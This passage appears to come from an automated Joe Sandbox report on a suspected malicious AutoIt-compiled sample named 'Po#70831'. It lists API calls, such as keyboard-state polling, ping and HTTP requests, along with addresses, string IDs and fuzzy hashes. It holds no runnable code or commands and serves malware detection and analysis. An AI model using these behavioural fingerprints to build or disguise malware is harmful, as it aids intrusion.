                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                      • API String ID: 323675364-22481851
                                      • Opcode ID: ace76c6268d1c0415ffb23ac9f7d3fcbef12cb4cd33204d78e649b574d0ac3e6
                                      • Instruction ID: 3bf3d23a547f5807bf2cf781f140f0276d237f0ec4a6374a46c726e48a9efe74
                                      • Opcode Fuzzy Hash: ace76c6268d1c0415ffb23ac9f7d3fcbef12cb4cd33204d78e649b574d0ac3e6
                                      • Instruction Fuzzy Hash: B4413B72C1022CABCF21EFA5DC95CFEBB78BF54344B04416AE901A3161EB345E08CB94
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00513C5C
                                      • CoInitialize.OLE32(00000000), ref: 00513C8A
                                      • CoUninitialize.OLE32 ref: 00513C94
                                      • _wcslen.LIBCMT ref: 00513D2D
                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00513DB1
                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00513ED5
                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00513F0E
                                      • CoGetObject.OLE32(?,00000000,0052FB98,?), ref: 00513F2D
                                      • SetErrorMode.KERNEL32(00000000), ref: 00513F40
                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00513FC4
                                      • VariantClear.OLEAUT32(?), ref: 00513FD8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                      • String ID:
                                      • API String ID: 429561992-0
                                      • Opcode ID: dbf4804a1360336f52b40ebc8781114fb039eac4ea23678add63ff9823e91722
                                      • Instruction ID: b5f7e9160ff56e9df7e2a0cbf9d45dbfe22f2c7cb7205710341d63b7101e0dd9
                                      • Opcode Fuzzy Hash: dbf4804a1360336f52b40ebc8781114fb039eac4ea23678add63ff9823e91722
                                      • Instruction Fuzzy Hash: B5C169716083059FE700DF68C89496BBBE9FF89748F10492DF98A9B251D730ED46CB52
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00507AF3
                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00507B8F
                                      • SHGetDesktopFolder.SHELL32(?), ref: 00507BA3
                                      • CoCreateInstance.OLE32(0052FD08,00000000,00000001,00556E6C,?), ref: 00507BEF
                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00507C74
                                      • CoTaskMemFree.OLE32(?,?), ref: 00507CCC
                                      • SHBrowseForFolderW.SHELL32(?), ref: 00507D57
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00507D7A
                                      • CoTaskMemFree.OLE32(00000000), ref: 00507D81
                                      • CoTaskMemFree.OLE32(00000000), ref: 00507DD6
                                      • CoUninitialize.OLE32 ref: 00507DDC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                      • String ID:
                                      • API String ID: 2762341140-0
                                      • Opcode ID: ad07a3fce8ada2d671938aabfe41dbfd3ebdd69ec9935f704249b9027a74a666
                                      • Instruction ID: 116ba421afa209ac221d2ce4b829e621b835a4855b58bd5f6180c90138939e79
                                      • Opcode Fuzzy Hash: ad07a3fce8ada2d671938aabfe41dbfd3ebdd69ec9935f704249b9027a74a666
                                      • Instruction Fuzzy Hash: CDC11A75A04109AFDB14DFA4C884DAEBFF9FF48314B1484A9E819DB262D730EE45CB90
                                      APIs
                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00525504
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00525515
                                      • CharNextW.USER32(00000158), ref: 00525544
                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00525585
                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0052559B
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005255AC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$CharNext
                                      • String ID:
                                      • API String ID: 1350042424-0
                                      • Opcode ID: e007e05f6fa90272de321d416d44202a6ed4ddc7ba2a577e5a8cb61f4beaedff
                                      • Instruction ID: 08d78f46dab7894430526f95d87c578230bfa3447ded01bdef6b0b1309c8e818
                                      • Opcode Fuzzy Hash: e007e05f6fa90272de321d416d44202a6ed4ddc7ba2a577e5a8cb61f4beaedff
                                      • Instruction Fuzzy Hash: 5A618D30900629ABDF209F54EC849FE7F79FF0A720F104545F925AB2D1E7749A85DBA0
                                      APIs
                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 004EFAAF
                                      • SafeArrayAllocData.OLEAUT32(?), ref: 004EFB08
                                      • VariantInit.OLEAUT32(?), ref: 004EFB1A
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 004EFB3A
                                      • VariantCopy.OLEAUT32(?,?), ref: 004EFB8D
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004EFBA1
                                      • VariantClear.OLEAUT32(?), ref: 004EFBB6
                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 004EFBC3
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004EFBCC
                                      • VariantClear.OLEAUT32(?), ref: 004EFBDE
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004EFBE9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                      • String ID:
                                      • API String ID: 2706829360-0
                                      • Opcode ID: 86d37941d7a2b3b2caaffd0065d0e53ccd16eef6fd2bb54bcdded45321ae2aa0
                                      • Instruction ID: 440dd7cb190dccbeb868224923d624bfbd30aac335a42be41ba3b89e9dfc06c2
                                      • Opcode Fuzzy Hash: 86d37941d7a2b3b2caaffd0065d0e53ccd16eef6fd2bb54bcdded45321ae2aa0
                                      • Instruction Fuzzy Hash: 34416335A002199FCF10EF65CC549AEBFB9FF58345F00806AE915A7261D734A94ACF94
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 004F9CA1
                                      • GetAsyncKeyState.USER32(000000A0), ref: 004F9D22
                                      • GetKeyState.USER32(000000A0), ref: 004F9D3D
                                      • GetAsyncKeyState.USER32(000000A1), ref: 004F9D57
                                      • GetKeyState.USER32(000000A1), ref: 004F9D6C
                                      • GetAsyncKeyState.USER32(00000011), ref: 004F9D84
                                      • GetKeyState.USER32(00000011), ref: 004F9D96
                                      • GetAsyncKeyState.USER32(00000012), ref: 004F9DAE
                                      • GetKeyState.USER32(00000012), ref: 004F9DC0
                                      • GetAsyncKeyState.USER32(0000005B), ref: 004F9DD8
                                      • GetKeyState.USER32(0000005B), ref: 004F9DEA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: 265ea757c692cca93c149da9cbca4fd7d2f226d89b0a2c4bf04640ac44cdf546
                                      • Instruction ID: db72622372084045c634cfd7425cef4d9d45f3f1a9a86e28ba8502e2c3475c35
                                      • Opcode Fuzzy Hash: 265ea757c692cca93c149da9cbca4fd7d2f226d89b0a2c4bf04640ac44cdf546
                                      • Instruction Fuzzy Hash: 624197345047CD69FF31966488043B7BEA06F22344F18805BD7C6567C2D7A99DC8C7AA
                                      APIs
                                      • WSAStartup.WSOCK32(00000101,?), ref: 005105BC
                                      • inet_addr.WSOCK32(?), ref: 0051061C
                                      • gethostbyname.WSOCK32(?), ref: 00510628
                                      • IcmpCreateFile.IPHLPAPI ref: 00510636
                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 005106C6
                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 005106E5
                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 005107B9
                                      • WSACleanup.WSOCK32 ref: 005107BF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                      • String ID: Ping
                                      • API String ID: 1028309954-2246546115
                                      • Opcode ID: d36436377b2f502d2e604ded621001d77dd8c8c086636d128276a816b22b8a3a
                                      • Instruction ID: 038b291381174637f967b52807260fe2d48609e920328e3d4042729eba895f90
                                      • Opcode Fuzzy Hash: d36436377b2f502d2e604ded621001d77dd8c8c086636d128276a816b22b8a3a
                                      • Instruction Fuzzy Hash: 119167356042019FE720DF15C889B5ABFE0FF45318F1589A9E4698B6E2C7B4EC85CF81
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen$BuffCharLower
                                      • String ID: cdecl$none$stdcall$winapi
                                      • API String ID: 707087890-567219261
                                      • Opcode ID: b0ae7af471f42499f3986e053f75e9fff5bc8d84ad4cd7e3fd71bcc66802062a
                                      • Instruction ID: 7cc8d5099ecf19ee0dfc21e5ad261e1189c58d6b1250fb193533b2601d2edcfb
                                      • Opcode Fuzzy Hash: b0ae7af471f42499f3986e053f75e9fff5bc8d84ad4cd7e3fd71bcc66802062a
                                      • Instruction Fuzzy Hash: 1551A071A001169BDF24DF6DC9509FEBBA6BF65324B20472AE826E72C5DB34DD80C790
                                      APIs
                                      • CoInitialize.OLE32 ref: 00513774
                                      • CoUninitialize.OLE32 ref: 0051377F
                                      • CoCreateInstance.OLE32(?,00000000,00000017,0052FB78,?), ref: 005137D9
                                      • IIDFromString.OLE32(?,?), ref: 0051384C
                                      • VariantInit.OLEAUT32(?), ref: 005138E4
                                      • VariantClear.OLEAUT32(?), ref: 00513936
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                      • API String ID: 636576611-1287834457
                                      • Opcode ID: 08eb93b04895865358dd79bc0f8ff0f07f0ffd18edc87d04b14538a368229092
                                      • Instruction ID: 49d31072a9834f25f6f20cfccbcfd301cb8c914c78c2eb885cf17a127258b541
                                      • Opcode Fuzzy Hash: 08eb93b04895865358dd79bc0f8ff0f07f0ffd18edc87d04b14538a368229092
                                      • Instruction Fuzzy Hash: 96619B71608201AFE710DF55C898BAABFE8FF49714F10081EF98597291C774EE89CB96
                                      APIs
                                        • Part of subcall function 004A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004A9BB2
                                        • Part of subcall function 004A912D: GetCursorPos.USER32(?), ref: 004A9141
                                        • Part of subcall function 004A912D: ScreenToClient.USER32(00000000,?), ref: 004A915E
                                        • Part of subcall function 004A912D: GetAsyncKeyState.USER32(00000001), ref: 004A9183
                                        • Part of subcall function 004A912D: GetAsyncKeyState.USER32(00000002), ref: 004A919D
                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00528B6B
                                      • ImageList_EndDrag.COMCTL32 ref: 00528B71
                                      • ReleaseCapture.USER32 ref: 00528B77
                                      • SetWindowTextW.USER32(?,00000000), ref: 00528C12
                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00528C25
                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00528CFF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#V
                                      • API String ID: 1924731296-4270840044
                                      • Opcode ID: 40c49bbb48dc87f728442f9df4bc06b1164512cf8a18243148bde00f39ba93aa
                                      • Instruction ID: 0e7ef8949b8c3f8daa953391e77342e9f26d9388823717efe09aae937ee61246
                                      • Opcode Fuzzy Hash: 40c49bbb48dc87f728442f9df4bc06b1164512cf8a18243148bde00f39ba93aa
                                      • Instruction Fuzzy Hash: 88517C70105214AFD710DF14D895BBA7BE4BF99714F00062EF956AB2E2CB749D08CB66
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 005033CF
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 005033F0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: LoadString$_wcslen
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 4099089115-3080491070
                                      • Opcode ID: bd5507e5ef2e11bddba64353aa4ed01ee83c2a167b1bf141a94535042c8f55bc
                                      • Instruction ID: 86bb25ccb7bb7a87b0d3d841a51c66a0c31c402ce7c8a52a76cc39535eb97270
                                      • Opcode Fuzzy Hash: bd5507e5ef2e11bddba64353aa4ed01ee83c2a167b1bf141a94535042c8f55bc
                                      • Instruction Fuzzy Hash: D951D131900109AACF14EBE1CD42EFEBB78BF14344F14406AF805720A2EB392F58DB64
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen$BuffCharUpper
                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                      • API String ID: 1256254125-769500911
                                      • Opcode ID: 52eddfc27c8280e9dbaea85d9fdbd0ea397caba70545a9edbdbaea3e69e2d73e
                                      • Instruction ID: ce882c5d7db6735ac371e51db350746c81560786fbd0a4c4fa257e7e79a5ca67
                                      • Opcode Fuzzy Hash: 52eddfc27c8280e9dbaea85d9fdbd0ea397caba70545a9edbdbaea3e69e2d73e
                                      • Instruction Fuzzy Hash: 1641E532A0012A9ADB106F7DC8905BF7BA5EFA2758B24412BE621D7380F739CD81C7D5
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 005053A0
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00505416
                                      • GetLastError.KERNEL32 ref: 00505420
                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 005054A7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Error$Mode$DiskFreeLastSpace
                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                      • API String ID: 4194297153-14809454
                                      • Opcode ID: d7ebe4b77617255808d1b3684fea8b72521169140007627e1e42e686937d984f
                                      • Instruction ID: e9715d8124b7f3ccedb6639e6abcd6fa25c2ce7841a86113348990866784f6b2
                                      • Opcode Fuzzy Hash: d7ebe4b77617255808d1b3684fea8b72521169140007627e1e42e686937d984f
                                      • Instruction Fuzzy Hash: 13319E35A006059FCB10DF68C485AEEBFB4FF55309F54846AE805CB292E770DD8ACB91
                                      APIs
                                      • CreateMenu.USER32 ref: 00523C79
                                      • SetMenu.USER32(?,00000000), ref: 00523C88
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00523D10
                                      • IsMenu.USER32(?), ref: 00523D24
                                      • CreatePopupMenu.USER32 ref: 00523D2E
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00523D5B
                                      • DrawMenuBar.USER32 ref: 00523D63
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                      • String ID: 0$F
                                      • API String ID: 161812096-3044882817
                                      • Opcode ID: 76e1e19d60339ebd9aed611e4aef548821cfe07b36a6c494349494a5374796bb
                                      • Instruction ID: 9f07d0121b9ec8fa7e4f1fb2a12ba7db5cad4a2a33fbb7aca414cb06769fc1d6
                                      • Opcode Fuzzy Hash: 76e1e19d60339ebd9aed611e4aef548821cfe07b36a6c494349494a5374796bb
                                      • Instruction Fuzzy Hash: 4941A974A01209AFDB20CF64E884AAA7FB5FF4A340F140028F906A73A0D774EA14DF94
                                      APIs
                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00523A9D
                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00523AA0
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00523AC7
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00523AEA
                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00523B62
                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00523BAC
                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00523BC7
                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00523BE2
                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00523BF6
                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00523C13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow
                                      • String ID:
                                      • API String ID: 312131281-0
                                      • Opcode ID: d491176c63039073924c32c89a78265e76e878d56aaa48673d392b8dab68fcff
                                      • Instruction ID: 3b7ead5607e3eca099b83a32450d841f62511ccf5233ce6abf953bcd9e7f76aa
                                      • Opcode Fuzzy Hash: d491176c63039073924c32c89a78265e76e878d56aaa48673d392b8dab68fcff
                                      • Instruction Fuzzy Hash: 38616A75900218AFDB20DFA8DC81EEE7BB8FF49700F140099FA15AB2A1C774AE45DB54
                                      APIs
                                      • _free.LIBCMT ref: 004C2C94
                                        • Part of subcall function 004C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000), ref: 004C29DE
                                        • Part of subcall function 004C29C8: GetLastError.KERNEL32(00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000,00000000), ref: 004C29F0
                                      • _free.LIBCMT ref: 004C2CA0
                                      • _free.LIBCMT ref: 004C2CAB
                                      • _free.LIBCMT ref: 004C2CB6
                                      • _free.LIBCMT ref: 004C2CC1
                                      • _free.LIBCMT ref: 004C2CCC
                                      • _free.LIBCMT ref: 004C2CD7
                                      • _free.LIBCMT ref: 004C2CE2
                                      • _free.LIBCMT ref: 004C2CED
                                      • _free.LIBCMT ref: 004C2CFB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 20f77f828db867175d189d91a7cd85c4ff5b35ffc3f49022aad1e97b6958d7d8
                                      • Instruction ID: a36c4bd5c616d21fa3e7e0a2a5aca561b3139459b4178a0d33a45a178ea6d956
                                      • Opcode Fuzzy Hash: 20f77f828db867175d189d91a7cd85c4ff5b35ffc3f49022aad1e97b6958d7d8
                                      • Instruction Fuzzy Hash: 841119BA200008BFCB42EF55DA42EDD3BA5FF05344F4040AEFA485F222D6B5EE509B94
                                      APIs
                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00491459
                                      • OleUninitialize.OLE32(?,00000000), ref: 004914F8
                                      • UnregisterHotKey.USER32(?), ref: 004916DD
                                      • DestroyWindow.USER32(?), ref: 004D24B9
                                      • FreeLibrary.KERNEL32(?), ref: 004D251E
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004D254B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                      • String ID: close all
                                      • API String ID: 469580280-3243417748
                                      • Opcode ID: 2b9e58267e7e9f1a83067e72623371a33ace7d434ea1f4dc933c45c8d2bbc126
                                      • Instruction ID: a7b939f37e8959676d703f53765e616b8e4e7a3659bb375b26338d136a799df5
                                      • Opcode Fuzzy Hash: 2b9e58267e7e9f1a83067e72623371a33ace7d434ea1f4dc933c45c8d2bbc126
                                      • Instruction Fuzzy Hash: C4D18B307012129FCB29EF55D5A9A29FBA0BF15704F1541AFE44A6B362CB38AC12CF59
                                      APIs
                                      • SetWindowLongW.USER32(?,000000EB), ref: 00495C7A
                                        • Part of subcall function 00495D0A: GetClientRect.USER32(?,?), ref: 00495D30
                                        • Part of subcall function 00495D0A: GetWindowRect.USER32(?,?), ref: 00495D71
                                        • Part of subcall function 00495D0A: ScreenToClient.USER32(?,?), ref: 00495D99
                                      • GetDC.USER32 ref: 004D46F5
                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004D4708
                                      • SelectObject.GDI32(00000000,00000000), ref: 004D4716
                                      • SelectObject.GDI32(00000000,00000000), ref: 004D472B
                                      • ReleaseDC.USER32(?,00000000), ref: 004D4733
                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 004D47C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                      • String ID: U
                                      • API String ID: 4009187628-3372436214
                                      • Opcode ID: c25ef29686469e44026650fd2dba41aac64f07a60631b688a25937d7dd4d3306
                                      • Instruction ID: 55bccd812be99a42cedf8553c710da1cb4168fce5f99a3474122c53fcc6c64d1
                                      • Opcode Fuzzy Hash: c25ef29686469e44026650fd2dba41aac64f07a60631b688a25937d7dd4d3306
                                      • Instruction Fuzzy Hash: 6F71F134400205DFCF218F64C994ABA7FB1FF8A364F28426BE9565A3A6C338C842DF55
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 005035E4
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • LoadStringW.USER32(00562390,?,00000FFF,?), ref: 0050360A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: LoadString$_wcslen
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 4099089115-2391861430
                                      • Opcode ID: 2f2c3e0db6c6524e293b9290b05d111674885c1a416f4d0308a919cd8971a240
                                      • Instruction ID: fe389e7ee3d9e43fdfe3a717eda73ff6842575507c05ea6291b0eb1d1473649d
                                      • Opcode Fuzzy Hash: 2f2c3e0db6c6524e293b9290b05d111674885c1a416f4d0308a919cd8971a240
                                      • Instruction Fuzzy Hash: CE517D71900209BACF14EBA5CC42EEDBF38FF15345F04412AF505721A1EB752B98DBA8
                                      APIs
                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0050C272
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0050C29A
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0050C2CA
                                      • GetLastError.KERNEL32 ref: 0050C322
                                      • SetEvent.KERNEL32(?), ref: 0050C336
                                      • InternetCloseHandle.WININET(00000000), ref: 0050C341
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                      • String ID:
                                      • API String ID: 3113390036-3916222277
                                      • Opcode ID: 4ae173e64c2697a51653aedeaa6c15e01f57ffa52b44d10e7a85f4979f3e3484
                                      • Instruction ID: da9ca24197708c912713e18e80ec473cae3300f20e7de52326ba042f5d784dd0
                                      • Opcode Fuzzy Hash: 4ae173e64c2697a51653aedeaa6c15e01f57ffa52b44d10e7a85f4979f3e3484
                                      • Instruction Fuzzy Hash: E8316DB1500604AFD7319FA48888AAF7FFCFF5A744B148A1EF48692281DB34DD099B61
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004D3AAF,?,?,Bad directive syntax error,0052CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 004F98BC
                                      • LoadStringW.USER32(00000000,?,004D3AAF,?), ref: 004F98C3
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004F9987
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: HandleLoadMessageModuleString_wcslen
                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                      • API String ID: 858772685-4153970271
                                      APIs
                                      • GetParent.USER32 ref: 004F20AB
                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 004F20C0
                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004F214D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: ClassMessageNameParentSend
                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                      • API String ID: 1290815626-3381328864
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
